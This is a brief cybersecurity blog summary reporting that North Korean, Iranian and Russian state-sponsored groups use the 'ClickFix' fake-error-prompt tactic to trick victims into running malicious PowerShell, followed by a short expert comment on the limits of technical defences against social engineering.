State-Sponsored Hackers Embrace ClickFix Social Engineering for Espionage Campaigns

Threat actors from North Korea (Kimsuky), Iran (MuddyWater), and Russia (APT28, UNK_RemoteRogue) are increasingly using the “ClickFix” tactic in espionage operations. ClickFix manipulates victims into manually running malicious PowerShell commands by displaying fake error prompts on fraudulent websites. Between late 2024 and early 2025, these campaigns targeted think tanks, Middle Eastern organizations, and arms manufacturers. Attackers exploited trust through spoofed emails and decoy documents to trigger manual malware execution and establish persistent access.

Expert Analysis:


ClickFix is the latest proof that technical protections alone cannot defeat social engineering. Attackers are bypassing security tools not by force but by persuasion, exploiting human reflexes instead of system flaws. When a fake prompt can open a backdoor as effectively as a zero-day exploit, the entire defense strategy must evolve beyond reactive patches to proactive user conditioning.

Read the full article here.

Stay informed with us!

You can subscribe to our monthly cybersecurity newsletter to receive updates about us and the industry

Blog

Check the latest updates on threats, stories, events and analysis.

Discord ID card breach

When Customer Support Becomes the Weakest Link: Lessons from the Discord Breach

How Businesses Can Protect Themselves From MatrixPDF Attacks

MatrixPDF Puts Gmail Users at Risk with Malicious PDF Attachments

Swiss e-ID and UAE Pass

Swiss e-ID vs UAE Pass: managing digital government identity